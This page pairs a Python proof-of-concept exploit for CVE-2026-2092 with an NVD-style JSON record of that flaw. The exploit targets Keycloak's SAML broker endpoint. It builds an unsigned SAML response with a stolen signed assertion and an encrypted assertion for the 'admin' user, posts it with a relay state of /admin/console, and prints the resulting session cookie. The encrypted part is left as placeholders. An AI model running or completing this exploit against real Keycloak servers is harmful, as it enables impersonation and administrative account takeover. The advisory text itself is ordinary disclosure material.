CVE-2026-2092

# CVE-2026-2092 PoC - Keycloak SAML Encrypted Assertion Bypass # This PoC demonstrates the vulnerability where Keycloak fails to properly # validate encrypted assertions when the overall SAML response is not signed import requests import base64 from lxml import etree from datetime import datetime TARGET_URL = "https://vulnerable-keycloak.com/auth/realms/{realm}/broker/saml/endpoint" ATTACKER_ASSERTION = "" # Valid signed SAML assertion from legitimate user TARGET_USER = "admin" # Target user to impersonate def create_malicious_saml_response(): """ Create a malicious SAML response with: 1. Unsigned response envelope 2. Valid signed assertion (to establish trust) 3. Malicious encrypted assertion for target principal """ saml_response = f"""<?xml version="1.0" encoding="UTF-8"?> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_id_{datetime.now().timestamp()}" Version="2.0" IssueInstant="{datetime.now().isoformat()}" Destination="{TARGET_URL}"> <saml:Issuer>https://attacker-idp.com</saml:Issuer> <!-- Note: Response is NOT signed --> <!-- Valid signed assertion (stolen from legitimate auth) --> {ATTACKER_ASSERTION} <!-- Malicious encrypted assertion for target user --> <saml:EncryptedAssertion> <xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" Type="http://www.w3.org/2001/04/xmlenc#Element"> <xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes256-cbc"/> <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <xenc:EncryptedKey> <xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/> <xenc:CipherData> <xenc:CipherValue>[Encrypted Key Value]</xenc:CipherValue> </xenc:CipherData> </xenc:EncryptedKey> </ds:KeyInfo> <xenc:CipherData> <xenc:CipherValue> <!-- Encrypted assertion containing: --> <!-- <saml:Assertion> --> <!-- <saml:Subject> --> <!-- <saml:NameID>{TARGET_USER}</saml:NameID> --> <!-- </saml:Subject> --> <!-- <saml:AttributeStatement> --> <!-- <saml:Attribute Name="role"><saml:AttributeValue>admin</saml:AttributeValue></saml:Attribute> --> <!-- </saml:AttributeStatement> --> <!-- </saml:Assertion> --> </xenc:CipherValue> </xenc:CipherData> </xenc:EncryptedData> </saml:EncryptedAssertion> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> </samlp:Response>""" return base64.b64encode(saml_response.encode()).decode() def exploit(): """Send malicious SAML response to Keycloak broker endpoint""" saml_response = create_malicious_saml_response() data = { "SAMLResponse": saml_response, "RelayState": "/admin/console" } response = requests.post(TARGET_URL, data=data, allow_redirects=False) if response.status_code == 302 and "location" in response.headers: print("[+] Exploit successful! Authentication bypassed.") print(f"[+] Session cookie: {response.headers.get('Set-Cookie')}") return True else: print("[-] Exploit failed or target not vulnerable") return False if __name__ == "__main__": print("CVE-2026-2092 Keycloak SAML Assertion Bypass PoC") exploit()

{"cve": {"id": "CVE-2026-2092", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:24.577", "lastModified": "2026-03-18T14:52:44.227", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. Keycloak's Security Assertion Markup Language (SAML) broker endpoint does not properly validate encrypted assertions when the overall SAML response is not signed. An attacker with a valid signed SAML assertion can exploit this by crafting a malicious SAML response. This allows the attacker to inject an encrypted assertion for an arbitrary principal, leading to unauthorized access and potential information disclosure."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Keycloak. El endpoint del broker de Security Assertion Markup Language (SAML) de Keycloak no valida correctamente las aserciones cifradas cuando la respuesta SAML general no está firmada. Un atacante con una aserción SAML firmada válida puede explotar esto al crear una respuesta SAML maliciosa. Esto permite al atacante inyectar una aserción cifrada para un principal arbitrario, lo que lleva a un acceso no autorizado y a una potencial revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:3925", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3926", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3947", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3948", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-2092", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437296", "source": "[email protected]"}]}}